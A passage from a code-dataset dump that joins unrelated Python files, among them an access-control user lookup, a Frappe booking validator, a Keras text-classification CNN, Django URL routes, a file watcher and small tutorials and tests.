datetime.timedelta(seconds=5))\n logger.debug(self._last_user_accessed.key_id)\n logger.debug(self._last_user_accessed.key_id != user.key_id)\n if ((datetime.datetime.now() - self._last_time_accessed) > datetime.timedelta(seconds=5)) or (self._last_user_accessed.key_id != user.key_id):\n logger.info(\"Event put for user: \" + user.full_name)\n self._FlexDB.PutEvent(0, user.key_id,\n \"S-1-0581B9AD-5CDC-4d86-A328-0D94A615A418\", 289, 0,\n datetime.datetime.now()+datetime.timedelta(seconds=-time.timezone), '', None)\n self._last_user_accessed = user\n self._last_time_accessed = datetime.datetime.now()\n except Exception as e:\n logger = logging.getLogger(__name__)\n logger.exception(e)\n\n def has_access(self, door: ControlPoint, user: User) -> bool:\n try:\n users = self._FlexDB.GetUsers4Device(\"S-1-0581B9AD-5CDC-4d86-A328-0D94A615A418\")\n except Exception as e:\n logger = logging.getLogger(__name__)\n logger.exception(e)\n 
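# Fail closed: if the FlexDB user lookup raised, report no access instead of propagating the error.\n            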
return False\n\n if not users:\n return False\n\n return user.key_id in (u.strSID for u in users)\n\n def get_user_photo(self, user: User):\n try:\n photos = list(filter(lambda f: isfile(join(self._path, f)) and\n f.endswith(('.jpeg', '.jpg', '.png', '.JPG')) and\n f.startswith(user.key_id),\n listdir(self._path)))\n except Exception as e:\n logger = logging.getLogger(__name__)\n logger.exception(e)\n return None\n\n if len(photos)==0:\n return None\n\n with open(self._path + photos[0], 'rb') as pic:\n return pic.read()\n\n def get_unidentified_users(self) -> List[User]:\n try:\n users = [User(user.strSID,\n user.strFirstName+' '+user.strLastName,\n Vector(''))\n for user in self._FlexDB.GetUsers(\"\", False, \"\")]\n\n except Exception as e:\n logger = logging.getLogger(__name__)\n logger.exception(e)\n return None\n\n return users\n","repo_name":"BeanSecurity/octagram-biometric-identification-module","sub_path":"services/ACS.py","file_name":"ACS.py","file_ext":"py","file_size_in_byte":3938,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"72"} +{"seq_id":"2867931868","text":"import frappe\nfrom frappe.model.document import Document\nfrom datetime import datetime\nfrom datetime import timedelta\nfrom collections import namedtuple\nRange = namedtuple('Range', ['start', 'end'])\n\n\nclass GymTrainerBooking(Document):\n\tpass\n\n\n@frappe.whitelist() \ndef get_roles(email):\n\temail=frappe.session.user\n\troles = frappe.get_roles(email)\n\tprint(f'\\n\\nROLES={roles}\\n\\n')\n\tfor item in roles:\n\t\tif item == 'Gym Admin': return 'ADMIN'\n\treturn 'USER'\n\n\n\n@frappe.whitelist()\ndef validate(name,gym_trainer,start_date_and_time,duration_in_hours):\n\tprint (f'START DATE AND TIME: {start_date_and_time}')\n\tstart_date=datetime.strptime(start_date_and_time,'%Y-%m-%d %H:%M:%S')\n\tend_date=start_date + timedelta(hours = int(duration_in_hours))\n\tr1 = Range(start=start_date, end=end_date)\n\tprint(f'VALIDATE {gym_trainer},{start_date},{end_date}')\n\tdocList=frappe.db.get_list('Gym Trainer Booking',filters={'gym_trainer':gym_trainer,},fields=['name','start_date_and_time', 'duration_in_hours'])\n\tfor item in docList:\n\t\titemEndDate=item.start_date_and_time+timedelta(hours = int(item.duration_in_hours))\n\t\tprint(f'COMPARING {item.name},{item.start_date_and_time},{itemEndDate},{item.duration_in_hours}')\n\t\tif (item.name == name): \n\t\t\tprint('CONTINUE')\n\t\t\tcontinue\n\t\tr2 = Range(start=item.start_date_and_time, end=itemEndDate)\n\t\tlatest_start = max(r1.start, r2.start)\n\t\tearliest_end = min(r1.end, r2.end)\n\t\toverlap=0\n\t\tif latest_start < earliest_end:\n\t\t\toverlap = 1\n\t\tprint(f'TRAINER BOOKING {overlap}')\n\t\tif overlap > 0:\n\t\t\t#msg = f'Trainer is already booked for that date range'\n\t\t\t#frappe.throw(msg)\n\t\t\treturn 1\n\tdateStr=str(start_date.year)+'-'\n\tif start_date.month < 10: dateStr += '0'\n\tdateStr+=str(start_date.month)+'-'\n\tif start_date.day < 10: dateStr += '0'\n\tdateStr+=str(start_date.day)+' '\n\tif start_date.hour < 10: dateStr += '0'\n\tdateStr+=str(start_date.hour)+':00:00'\n\treturn dateStr\n","repo_name":"andygarcia830/fgarcia_frappe_eval","sub_path":"fgarcia_frappe_eval/fgarcia_frappe_eval/doctype/gym_trainer_booking/gym_trainer_booking.py","file_name":"gym_trainer_booking.py","file_ext":"py","file_size_in_byte":1890,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"35404627803","text":"import os\nimport pickle\nimport 
argparse\nimport numpy as np\nimport pandas as po\n\nimport tensorflow as tf\nfrom tensorflow.keras.models import Model\nfrom tensorflow.keras.utils import to_categorical\nfrom tensorflow.keras.preprocessing.text import Tokenizer\nfrom tensorflow.keras.preprocessing.sequence import pad_sequences\n#from tensorflow.keras.layers import Embedding, Input, Dense, GlobalMaxPooling1D, Conv1D, MaxPooling1D, Flatten, TimeDistributed, LSTM, Bidirectional, Reshape\nfrom tensorflow.keras.layers import Embedding, Input, Dense, Conv2D, Reshape, MaxPooling2D, Flatten, Dropout\n\nfrom tensorflow.compat.v1 import ConfigProto\nfrom tensorflow.compat.v1 import InteractiveSession\n\nfrom sklearn.metrics import f1_score\n\nconfig = ConfigProto()\nconfig.gpu_options.allow_growth = True\nsession = InteractiveSession(config=config)\n\ndef fit_tokenizer(args, df):\n\t#df['Text'] = df['questionText'] + ' ' + df['answerText'] \n\n\ttexts = []\n\ttexts += df['text'].to_list()\n\ttexts += df['meta'].to_list()\n\n\ttokenizer = Tokenizer(num_words=args.vocab_size)\n\ttokenizer.fit_on_texts(texts)\n\n\treturn tokenizer\n\ndef make_embedding_layer(args, tokenizer):\n\tword_index = tokenizer.word_index\n\n\twith open('data/word2emb.pkl', 'rb') as f:\n\t\tword2emb = pickle.load(f)\n\n\tembedding_matrix = np.zeros((len(word_index) + 1, 300)) # words not found in embedding index will be all-zeros.\n\tfor word, i in word_index.items():\n\t\tembedding_vector = word2emb.get(word)\n\t\tif embedding_vector is not None:\n\t\t\tembedding_matrix[i] = embedding_vector\n\n\tGloVe = Embedding(len(word_index) + 1, 300, weights=[embedding_matrix], input_length=args.max_seq_len, trainable=True)\n\n\treturn GloVe\n\ndef get_train_val_test(args, df, tokenizer):\n\tsequences \t\t= tokenizer.texts_to_sequences(df['text'].to_list())\n\tmeta \t\t\t= tokenizer.texts_to_sequences(df['meta'].to_list())\n\n\tdata \t\t\t= pad_sequences(sequences, maxlen=args.max_seq_len)\n\tmeta \t\t\t= pad_sequences(meta, maxlen=args.max_seq_len)\n\n\tlabels \t\t\t= df['target'].to_list()\n\tlabels \t\t\t= to_categorical(np.asarray(labels))\t\n\n\tstacked_data = []\n\tfor i in range(len(data)):\n\t\tstacked_data.append(np.vstack((data[i], meta[i])))\n\t\t\n\tstacked_data = np.array(stacked_data)\n\n\tX_train \t\t= stacked_data[:int(args.train_percent*len(stacked_data))].reshape(-1, args.max_seq_len, 2)\n\tX_val \t\t\t= stacked_data[int(args.train_percent*len(stacked_data)):int(args.val_percent*len(stacked_data))].reshape(-1, args.max_seq_len, 2)\n\tX_test\t\t\t= stacked_data[int(args.val_percent*len(stacked_data)):].reshape(-1, args.max_seq_len, 2)\n\n\ty_train \t\t= labels[:int(args.train_percent*len(labels))]\n\ty_val \t\t\t= labels[int(args.train_percent*len(labels)):int(args.val_percent*len(labels))]\n\ty_test \t\t\t= labels[int(args.val_percent*len(labels)):]\n\n\treturn (X_train, y_train), (X_val, y_val), (X_test, y_test)\n\ndef build_model(args, GloVe, use_meta):\n\tsequence_input = Input(shape=(args.max_seq_len, 2), dtype='int32')\n\n\ttext_in = sequence_input[:, :, 0]\n\tx = GloVe(text_in)\n\tx = Reshape((350, 300, 1))(x)\n\tx = Conv2D(256, 5, activation='tanh')(x)\n\tx = MaxPooling2D((46, 296))(x)\n\tx = Flatten()(x)\n\tx = Dropout(0.2)(x)\n\t\n\tmeta_in = sequence_input[:, :, 1]\n\tm = GloVe(meta_in)\n\tm = Reshape((350, 300, 1))(m)\n\tm = Conv2D(256, 5, activation='tanh')(m)\n\tm = MaxPooling2D((46, 296))(m)\n\tm = Flatten()(m)\n\tm = Dropout(0.2)(m)\n\t\n\tif use_meta:\n\t\tout = tf.keras.backend.concatenate((x, m), axis=1)\n\t\n\telse:\n\t\tout = 
x\n\n\tpreds = Dense(2, activation='softmax')(out)\n\n\tmodel = Model(sequence_input, preds)\n\t\n\toptimizer = tf.keras.optimizers.Adam(lr=0.001)\n\tmodel.compile(loss='categorical_crossentropy', optimizer=optimizer, metrics=['accuracy'])\n\n\tmodel.summary()\n\n\treturn model\n\ndef preprocess_json(json_path, data_path):\n\tfrom tqdm import tqdm  # not imported at module level; imported here so the progress bar below works\n\n\tprint('Processed data for dataset not found, preprocessing json file {}'.format(json_path))\n\n\twith open(json_path, 'rb') as f:  # was hard-coded to the Auto dataset; use the path passed in\n\t\tdata = pickle.load(f)\n\n\tX = []\n\ty = []\n\n\tdf = po.DataFrame()\n\tfor key in tqdm(data, total=len(data)):\n\t\trow = data[key]\n\n\t\tmeta = ' '.join([row['title'], ' '.join(row['category']), ' '.join(row['description'])])\n\t\t\n\t\tfor i in range(len(row['questions_answers'])):\n\t\t\tdf_row = {}\n\t\t\tdf_row['meta'] = meta\n\n\t\t\tques = row['questions_answers'][i][0]\n\t\t\treviews = ' '.join(row['questions_answers'][i][2])\n\t\t\tdf_row['text'] = ' '.join([ques, reviews])\n\n\t\t\ttarget = row['questions_answers'][i][1]\n\t\t\tif target == 'Y':\n\t\t\t\tdf_row['target'] = 1\n\t\t\telif target == 'N':\n\t\t\t\tdf_row['target'] = 0\n\t\t\telse:\n\t\t\t\traise ValueError('unexpected answer label: {}'.format(target))\n\t\t\n\t\t\tdf = df.append(df_row, ignore_index=True)\n\n\tprint('Saved Processed data at {}'.format(data_path))\n\t\n\tdf.to_csv(data_path, index=False)\n\ndef get_data(dataset_name):\n\tif dataset_name == 'auto':\n\t\tdata_path = 'data/Auto_meta_qar.csv'\n\t\tjson_path = 'data/raw_json_data/Auto_meta_qar.pkl'\n\telif dataset_name == 'electronics':\n\t\tdata_path = 'data/electronics_meta_qar.csv'\n\t\tjson_path = 'data/raw_json_data/electronics_meta_qar.pkl'\n\telif dataset_name == 'home':\n\t\tdata_path = 'data/home_meta_qar.csv'\n\t\tjson_path = 'data/raw_json_data/home_meta_qar.pkl'\n\n\tif not os.path.exists(data_path):\n\t\tpreprocess_json(json_path, data_path)  # was preprocess_data, which is not defined anywhere\n\n\tprint('Loading dataset {}'.format(data_path))\n\tdf = po.read_csv(data_path).sample(frac=1)\n\n\treturn df\n\ndef main(args):\n\tprint('Running CNN model for {} dataset'.format(args.dataset_name))\n\tprint('Using Metadata - {}'.format(args.use_meta))\n\n\tdf = get_data(args.dataset_name)\n\n\ttokenizer = fit_tokenizer(args, df)\n\tGloVe = make_embedding_layer(args, tokenizer)\n\n\t(X_train, y_train), (X_val, y_val), (X_test, y_test) = get_train_val_test(args, df, tokenizer)\n\n\t#'''\n\tmodel = build_model(args, GloVe, use_meta=args.use_meta)\n\n\tearlystop = tf.keras.callbacks.EarlyStopping(monitor='val_loss', min_delta=0.001, patience=10)\n\tmodel_checkpoint = tf.keras.callbacks.ModelCheckpoint(filepath='cnn_{}_{}_best_model.hdf5'.format(args.dataset_name, args.use_meta), monitor='val_loss', save_best_only=True, save_weights_only=True)\n\n\thist = model.fit(X_train, y_train, validation_data=(X_val, y_val), epochs=100, batch_size=4, callbacks=[earlystop, model_checkpoint], shuffle=True)\n\n\tos.makedirs('training_history', exist_ok=True)\n\twith open('training_history/cnn_{}_{}_best_model.hdf5'.format(args.dataset_name, args.use_meta), 'wb') as f:\n\t\tpickle.dump(hist.history, f)\n\n\ty_pred = model.predict(X_test)\n\n\ty_pred = np.argmax(y_pred, axis = 1)\n\ty_test = np.argmax(y_test, axis = 1)\n\tprint(f1_score(y_test, y_pred))\n\n\tif not os.path.exists('results.csv'):\n\t\tresults_df = po.DataFrame()\n\telse:\n\t\tresults_df = po.read_csv('results.csv')\n\n\trow = {}\n\trow['model'] = 'cnn'\n\trow['dataset_name'] = args.dataset_name\n\trow['use_meta'] = args.use_meta\n\trow['final f1_score'] = f1_score(y_test, y_pred)\n\tresults_df = results_df.append(row, 
ignore_index=True)\n\t\n\tresults_df.to_csv('results.csv', index=False)\n\n\t#'''\n\nif __name__ == '__main__':\n\tparser = argparse.ArgumentParser()\n\n\tparser.add_argument('-dataset_name', type=str, default='auto', choices=['auto', 'electronics', 'home'])\n\tparser.add_argument('-use_meta', action='store_true')  # type=bool is an argparse pitfall: any non-empty string is truthy, so a flag is used instead\n\n\t#parser.add_argument('-data_path', type=str, default='data/electronics_meta_qar.csv')\n\tparser.add_argument('-vocab_size', type=int, default=1000000)\n\tparser.add_argument('-max_seq_len', type=int, default=350) #for default size -> average + 3 stds of lengths is 350\n\n\tparser.add_argument('-train_percent', type=float, default=0.7)\n\tparser.add_argument('-val_percent', type=float, default=0.9)\n\t#parser.add_argument('-test_percent', type=float, default=0.1)\n\n\targs = parser.parse_args()\n\n\tmain(args)\n\n'''\n\nprint('##', len(tokenizer.word_index))\n\nprint(sequences[0])\n\nword_index \nprint('Found %s unique tokens.' % len(word_index))\n\n\n\nprint(data[0])\n\nprint(len(sequences))\nprint(len(data))\n\n#labels = to_categorical(np.asarray(labels))\nprint('Shape of data tensor:', data.shape)\n#print('Shape of label tensor:', labels.shape)\n'''","repo_name":"vmm221313/Amazon_QA","sub_path":"main_cnn.py","file_name":"main_cnn.py","file_ext":"py","file_size_in_byte":7861,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"32017447147","text":"# A second way of sorting a list in Python is to use the built-in function sorted().\r\n# The sorted() function is different from the .sort() method in two ways --\r\n# 1. It comes before a list, instead of after as all built-in functions do.\r\n# 2. It generates a new list rather than modifying the one that already exists.\r\n\r\nnamesOnList = [\r\n    \"Will Smith\", \r\n    \"Carlton Banks\", \r\n    \"Hilary Banks\", \r\n    \"Ashley Banks\", \r\n    \"Philip Banks\", \r\n    \"Vivian Banks\", \r\n    \"Geoffrey Butler\"\r\n]\r\n\r\n# Using sorted(), I can create a new list, called characterNames --\r\n\r\ncharacterNames = sorted(namesOnList)\r\nprint(characterNames)\r\n\r\n# OUTPUT: [\r\n# 'Ashley Banks', \r\n# 'Carlton Banks', \r\n# 'Geoffrey Butler', \r\n# 'Hilary Banks', \r\n# 'Philip Banks', \r\n# 'Vivian Banks', \r\n# 'Will Smith'\r\n# ]\r\n\r\n# Note: Using sorted did not change namesOnList --\r\n\r\nprint(namesOnList)\r\n\r\n# OUTPUT: [\r\n# 'Will Smith', \r\n# 'Vivian Banks', \r\n# 'Philip Banks', \r\n# 'Hilary Banks', \r\n# 'Geoffrey Butler', \r\n# 'Carlton Banks', \r\n# 'Ashley Banks'\r\n# ]\r\n\r\ngames = [\"Grand Theft Auto\", \"Doom Eternal\", \"Watch Dogs\", \"Assassin's Creed\", \"SimCity4000\"]\r\n\r\nsortedGames = sorted(games)\r\nprint(games)\r\nprint(sortedGames)\r\n\r\n# OUTPUT: games = ['Grand Theft Auto', 'Doom Eternal', 'Watch Dogs', \"Assassin's Creed\", 'SimCity4000']\r\n# OUTPUT: sortedGames = [\"Assassin's Creed\", 'Doom Eternal', 'Grand Theft Auto', 'SimCity4000', 'Watch Dogs']","repo_name":"IdSolomon/python_lists","sub_path":"sorting_lists2.py","file_name":"sorting_lists2.py","file_ext":"py","file_size_in_byte":1433,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"29360765392","text":"\nfrom django.conf.urls import patterns, url\nfrom buglocator import views\nfrom django.conf import settings\n\nurlpatterns = patterns('buglocator.views',\n    url(r'^dashboard/$','list',name='list'),\n    url(r'^user/$','login',name='login'),\n    
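# the remaining routes cover registration, the public homepage, and the bug-reporting workflow\n    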
url(r'^registration/$','registration',name='registration'),\n    url(r'^$','homepage',name='homepage'),\n    url(r'^reportbug/$','reportbug',name='reportbug'),\n    url(r'^locatebug/$','locatebug',name='locatebug'),\n    url(r'^showbug/(?P<id>\\d+)$','showbug',name='showbug'),\n)\n","repo_name":"beerdotpy/Bug-Locator","sub_path":"minor/minorproject/buglocator/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":524,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"41388643277","text":"from os import path\nfrom glob import glob\nimport tempfile\n\nimport numpy as np\nfrom tempfile import TemporaryDirectory, NamedTemporaryFile\nimport torch as ch\nfrom torch.utils.data import Dataset\nimport webdataset as wds\n\nfrom ffcv import DatasetWriter\nfrom ffcv.reader import Reader\nfrom ffcv.fields import IntField, FloatField\nfrom test_writer import validate_simple_dataset\n\nfield_names = [\n    'index',\n    'value.pyd'\n]\n\nclass DummyDataset(Dataset):\n\n    def __init__(self, l):\n        self.l = l\n\n    def __len__(self):\n        return self.l\n\n    def __getitem__(self, index):\n        if index >= self.l:\n            raise IndexError()\n        return (index, np.sin(index))\n\ndef write_webdataset(folder, dataset, field_names):\n    pattern = path.join(folder, \"dataset-%06d.tar\")\n    writer = wds.ShardWriter(pattern, maxcount=20)\n    with writer as sink:\n        for i, sample in enumerate(dataset):\n            data = {\n                '__key__': f'sample_{i}'\n            }\n\n            for field_name, value in zip(field_names, sample):\n                data[field_name] = value\n            sink.write(data)\n\n\ndef pipeline(dataset):\n    return (dataset\n            .decode()\n            .to_tuple(*field_names)\n            )\n\nif __name__ == '__main__':\n    N = 1007\n    dataset = DummyDataset(N)\n    with TemporaryDirectory() as temp_directory:\n        with NamedTemporaryFile() as handle:\n            fname = handle.name\n            write_webdataset(temp_directory, dataset, field_names)\n            files = glob(path.join(temp_directory, '*'))\n            files = list(sorted(files))\n\n            print(fname)\n            writer = DatasetWriter(fname, {\n                'index': IntField(),\n                'value': FloatField()\n            })\n\n            writer.from_webdataset(files, pipeline)\n\n            validate_simple_dataset(fname, N, shuffled=False)","repo_name":"libffcv/ffcv","sub_path":"tests/test_webdataset.py","file_name":"test_webdataset.py","file_ext":"py","file_size_in_byte":1851,"program_lang":"python","lang":"en","doc_type":"code","stars":2660,"dataset":"github-code","pt":"72"} +{"seq_id":"34027703066","text":"'''Create a program that reads any sentence and says whether it is a palindrome, ignoring the spaces.\r\nExamples of palindromes (in Portuguese):\r\n\r\nAPOS A SOPA, A SACADA DA CASA, A TORRE DA DERROTA, O LOBO AMA O BOLO, ANOTARAM A DATA DA MARATONA.'''\r\n\r\nfrase = str(input('Digite uma frase: ')).strip().lower()\r\npalavras = frase.split()\r\njunto = ''.join(palavras)\r\ninverso = junto[::-1]\r\n\r\n#for i in range(len(junto) -1, -1, -1):\r\n#    inverso += junto[i]\r\n\r\nprint(f'O contrário de {frase} é:', inverso)\r\nprint('É' if junto == inverso else 'Não é', 'um palíndromo')","repo_name":"Thisgrama/115-Exercicios-do-Curso-em-Video","sub_path":"Mundo 02/053 - Detector de palíndromo.py","file_name":"053 - Detector de palíndromo.py","file_ext":"py","file_size_in_byte":562,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"27374327006","text":"from django.urls import path, re_path\nfrom . 
import views\n\napp_name = 'accounting'\nurlpatterns = [\n re_path(r'^[a-z]{4,}/$', views.accounting_index, name='accounting_index'),\n re_path(r'^[a-z]{4,}/create/$', views.create_record, name='create'),\n re_path(r'^[a-z]{4,}/update/$', views.update_record, name='update'),\n re_path(r'^[a-z]{4,}/remove/$', views.remove_record, name='remove'),\n re_path(r'^[a-z]{4,}/fill/$', views.fill_database, name='fill_database'),\n re_path(r'^[a-z]{4,}/ajax/$', views.ajax, name='ajax'),\n re_path(r'^[a-z]{4,}/distribute/$', views.distribute, name='distribute'),\n]","repo_name":"timspeer/demo","sub_path":"Django/production_smitools/accounting/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":620,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"16810323006","text":"# Imports\n\nimport os\n\n# Exports\n\n__all__ = (\n \"get_modified_times\",\n \"Watcher\",\n)\n\n# Functions\n\n\ndef get_modified_times(path, extensions=None, follow_symlinks=True):\n \"\"\"Get the modified times for all files within a given path.\n\n :param path: The path to the files.\n :type path: str\n\n :param extensions: A list of extensions (including the dot) to be watched. If omitted, all extensions are watched.\n This parameter is optional, but recommended.\n :type extensions: list[str]\n\n :param follow_symlinks: Indicates whether symlinks should be followed.\n :type follow_symlinks: bool\n\n :rtype: collections.Iterable(time)\n :returns: Yields the last modified timestamp of each file.\n\n \"\"\"\n for root, dirs, files in os.walk(path, followlinks=follow_symlinks):\n for f in files:\n if extensions is not None:\n if f.endswith(tuple(extensions)):\n path = os.path.join(root, f)\n try:\n yield os.stat(path).st_mtime\n except OSError:\n pass\n else:\n path = os.path.join(root, f)\n try:\n yield os.stat(path).st_mtime\n except OSError:\n pass\n\n\n# Classes\n\n\nclass Watcher(object):\n \"\"\"A watcher may be used to determine if the contents of a directory or file has changed.\"\"\"\n\n def __init__(self, path, extensions=None, follow_symlinks=True):\n \"\"\"Initialize a watcher.\n\n :param path: The path to be watched. This may be a file or directory.\n :type path: str\n\n :param extensions: A list of extensions (including the dot) to be watched when ``path`` is a directory. If\n omitted, all extensions are watched. This parameter is optional, but recommended.\n :type extensions: list[str]\n\n :param follow_symlinks: Indicates whether symlinks should be followed.\n :type follow_symlinks: bool\n\n \"\"\"\n self.errors = list()\n self.extensions = extensions\n self.follow_symlinks = follow_symlinks\n self.last_modified_time = 0\n self.path = path\n self._is_directory = os.path.isdir(path)\n self._is_file = os.path.isfile(path)\n\n @property\n def exists(self):\n \"\"\"Indicates whether the watched path exists.\n\n :rtype: bool\n\n \"\"\"\n return os.path.exists(self.path)\n\n @property\n def is_directory(self):\n \"\"\"Indicates the path is a directory.\n\n :rtype: bool\n\n \"\"\"\n return self._is_directory\n\n @property\n def is_file(self):\n \"\"\"Indicates the path is a file.\n\n :rtype: bool\n\n \"\"\"\n return self._is_file\n\n def watch(self):\n \"\"\"Watch the path for changes.\n\n :rtype: collections.Iterable(bool| None)\n :returns: ``True`` when the path has changed.\n\n Watches the ``path`` for changes, trapping any errors encountered. 
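Intended to be consumed as a generator from a polling loop.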
It yields ``True`` or ``False`` to indicate\n        a change (or not), or ``None`` when an error is encountered.\n\n        \"\"\"\n        if self.is_directory:\n            while True:\n                try:\n                    modified_time = max(get_modified_times(\n                        self.path,\n                        extensions=self.extensions,\n                        follow_symlinks=self.follow_symlinks)\n                    )\n                    if modified_time > self.last_modified_time:\n                        self.last_modified_time = modified_time\n                        yield True\n                except ValueError as e:\n                    self.errors.append(\"Directory watcher failed: %s (%s)\" % (self.path, e))\n                    yield None\n                else:\n                    yield False\n        elif self.is_file:\n            while True:\n                try:\n                    modified_time = os.stat(self.path).st_mtime\n                except OSError as e:\n                    self.errors.append(\"File watcher failed: %s (%s)\" % (self.path, e))\n                    yield None\n                    continue  # modified_time is unset when stat fails, so skip the comparison below\n\n                if modified_time > self.last_modified_time:\n                    self.last_modified_time = modified_time\n                    yield True\n                else:\n                    yield False\n        else:\n            raise ValueError(\"%s is not a file or directory.\" % self.path)\n","repo_name":"develmaycare/python-commonkit","sub_path":"commonkit/watchers/library.py","file_name":"library.py","file_ext":"py","file_size_in_byte":4413,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"138706472","text":"import pandas as pd\nimport numpy as np\nimport matplotlib.pyplot as plt\n\ndef visualize():\n    data = pd.read_csv('Bangladesh_Landslide_Cleaned_Data.csv')\n\n    month_occurence = data['month_number'].value_counts()\n    month_occurence = month_occurence.sort_index()\n\n    month_label = ['','January','February','March','April','May','June','July','August','September','October','November','December']\n\n    months = []\n    m_occurrences = []\n\n    for i in month_occurence.index:\n        months.append(month_label[i])\n        m_occurrences.append(month_occurence[i])\n\n\n    y_pos = np.arange(len(months))\n    \n    plt.barh(y_pos, m_occurrences, align='center', color='darkslategrey')\n    plt.yticks(y_pos, months)\n    plt.ylabel('Months')\n    plt.xlabel('Number of Landslides')\n    plt.title('Month vs Number of Landslides')\n    plt.tight_layout()\n\n    plt.rcParams['axes.facecolor']='#e0f2f1'\n    plt.rcParams['savefig.facecolor']='#e0f2f1'\n\n    plt.savefig('02_month_vs_nlandslides.png', dpi = 1000)\n    # plt.show()","repo_name":"abdalimran/BD-Landslide-Data-Flask-REST-API","sub_path":"month_vs_nlandslides.py","file_name":"month_vs_nlandslides.py","file_ext":"py","file_size_in_byte":1012,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"72"} +{"seq_id":"9293648028","text":"import time\r\nfrom Tkinter import *\r\n\r\nclass AfterIdleExample:\r\n    def __init__(self, master=None):\r\n        self.master = master\r\n        \r\n        self.frame = Frame(master, relief=RAISED, borderwidth=2)\r\n        Label(self.frame, text='Press the button\\nto start operation').pack()\r\n        self.frame.pack(padx=4, pady=4)\r\n        Button(master, text='Start', command=self.startOP).pack(side=TOP)\r\n\r\n    def startOP(self):\r\n        self.displayBusyCursor()\r\n        time.sleep(10.0) # simulate a long operation\r\n        \r\n    def displayBusyCursor(self):\r\n        self.master.configure(cursor='watch')\r\n        self.master.update()\r\n        self.master.after_idle(self.removeBusyCursor)\r\n        \r\n    def removeBusyCursor(self):\r\n        self.master.configure(cursor='arrow')\r\n        \r\nroot = Tk()\r\nroot.option_readfile('optionDB2')\r\nroot.title('Busy Cursor')\r\nexample = AfterIdleExample(root)\r\nroot.mainloop()\r\n","repo_name":"JoseRFJuniorBigData/PythonBooks","sub_path":"Python & TKinter 
Programming/Examples/Chapter18/busy_cursor.py","file_name":"busy_cursor.py","file_ext":"py","file_size_in_byte":930,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"72"} +{"seq_id":"32544106020","text":"#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n#     http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n#\n# Authors: Andrea Azzarone \n#\n\nimport numpy as np\nimport tensorflow as tf\nimport tensorflow_fold.public.blocks as td\nimport unittest\n\nimport sequence_transcoder\n\n\nclass TestSequenceTranscoder(unittest.TestCase):\n\n    def test_sequence_length(self):\n        st = sequence_transcoder.build_sequence_transcoder('src/test_data/vocab.txt', 3)\n        self.assertEqual(len(st.eval([\"hello\", \"world\"])), 2)\n        self.assertEqual(len(st.eval([\"hello\", \"world\", \"ciao\", \"mondo\"])), 4)\n        self.assertEqual(len(st.eval([\"hello\", \"world\", \"unknown_word\"])), 3)\n\n    def test_word_embedding_size(self):\n        st = sequence_transcoder.build_sequence_transcoder('src/test_data/vocab.txt', 3)\n        sequence = st.eval([\"hello\", \"world\"])\n        self.assertEqual([len(w) for w in sequence], [3,3])\n        \n        st = sequence_transcoder.build_sequence_transcoder('src/test_data/vocab.txt', 5)\n        sequence = st.eval([\"hello\", \"world\"])\n        self.assertEqual([len(w) for w in sequence], [5,5])\n\n    def test_same_word_embedding(self):\n        st = sequence_transcoder.build_sequence_transcoder('src/test_data/vocab.txt', 3)\n        sequence1 = st.eval([\"hello\", \"world\", \"hello\"])\n        sequence2 = st.eval([\"hello\", \"world\", \"hello\"])\n        self.assertTrue(np.array_equal(sequence1[0], sequence1[2]))\n        self.assertTrue(np.array_equal(sequence1, sequence2))\n\n    def test_unknown_word(self):\n        st = sequence_transcoder.build_sequence_transcoder('src/test_data/vocab.txt', 3)\n        sequence1 = st.eval([\"unknown_word1\", \"world\", \"unknown_word2\"])\n        sequence2 = st.eval([\"unknown_word3\", \"world\", \"unknown_word4\"])\n        self.assertTrue(np.array_equal(sequence1[0], sequence1[2]))\n        self.assertTrue(np.array_equal(sequence1, sequence2))\n\n\nif __name__ == '__main__':\n    sess = tf.InteractiveSession()\n    unittest.main()\n","repo_name":"azzar1/context2vec","sub_path":"src/test_sequence_transcoder.py","file_name":"test_sequence_transcoder.py","file_ext":"py","file_size_in_byte":2425,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"72"} +{"seq_id":"694484496","text":"import heapq\r\n\r\nroad_types={1:40,2:80,3:110}\r\n#roads have three types\r\n#1=40->between 20 and 60\r\n#2=80->between 60 and 100\r\n#3=110->between 100 and 120\r\n#the speed of each road type is the average of its min and max speed\r\n\r\nareas={} #a dictionary that saves areas; the key is the name and the value is an area object\r\nadded_data = \"\" #a string for recording roads and areas so they can be exported easily\r\n\r\n\r\n#creating classes\r\n#creating area class\r\nclass area:\r\n    def __init__(self,name):\r\n        self.name=name\r\n        self.ways=set(())#this attribute stores each area's neighbours and the road that connects them\r\n        #format will be-->{(area1,road1),(area2,road2),(area3,road3),...}\r\n\r\n#creating road class\r\nclass road:\r\n    def __init__(self,name,length,rtype):\r\n        self.name=name\r\n        self.length=length\r\n        self.speed=road_types[rtype]\r\n\r\n\r\ndef add_area(name, positionX, positionY, width, length, height):\r\n    '''this function acts like an API: it creates an area instance and records its data for the exported data file'''\r\n    areas[name]=area(name)\r\n    global added_data\r\n    added_data=added_data+f'{name},{positionX},{positionY},{width},{length},{height}\\n'\r\n\r\n\r\ndef add_road(name,area1,area2,length,rtype):\r\n    '''this function acts like an API: it creates a road instance and records its data for the exported data file'''\r\n    